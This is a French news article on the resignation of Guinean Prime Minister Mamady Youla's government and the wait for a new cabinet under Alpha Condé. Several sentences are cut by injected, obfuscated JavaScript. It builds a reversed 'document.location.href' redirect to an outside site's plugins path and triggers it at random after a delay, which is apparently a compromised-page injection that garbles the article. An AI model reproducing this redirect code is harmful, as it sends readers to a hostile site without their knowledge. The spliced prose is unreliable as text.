AFRIQUEPOLITIQUE

La Guinée dans l’attente d’un nouveau gouvernement

Après la démission ce jeudi du gouvernement sortant, le pays est dans l’attente d’une nouvelle équipe gouvernementale qui sera formée dans les prochains jours.

Lors du conseil des ministres qui s’est tenu plutôt que prévenu dans la matinée de ce jeudi, le chef de l’Etat guinéen Alpha Condé a reçu, au Palais présidentiel, la lettre de démission de son Premier ministre Mamady Youla, accompagné de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les membres du gouvernement sortant.

Quelques heures après, le ministre secrétaire général à la présidence de la république, Kiridi Naby Youssouf Bangoura, a fait une déclaration à la presse nationale pour annoncer officiellement la démission du gouvernement.

Selon lui, le président de la République a accepté la démission du gouvernement et a remercié le Premier ministre sortant et les membres du gouvernement pour les services rendus à la Nation.

M. Bangoura a affirmé que le président Alpha Condé a “instruit au Premier ministre et au gouvernement sortant d’assumer la gestion des affaires courantes jusqu’à la mise en place d’un nouveau gouvernement”.

Formé de 33 ministres, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont deux secrétaires généraux, le gouvernement sortant a été mis en place en janvier 2016.

Avant les dernières élections locales de février 2018, le président de la république avait annoncé un vaste remaniement de son gouvernement pour la mise en place d’une nouvelle équipe gouvernementale, afin de réaliser les objectifs de développement, avec les nouveaux élus dans les communes urbaines et rurales du pays.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :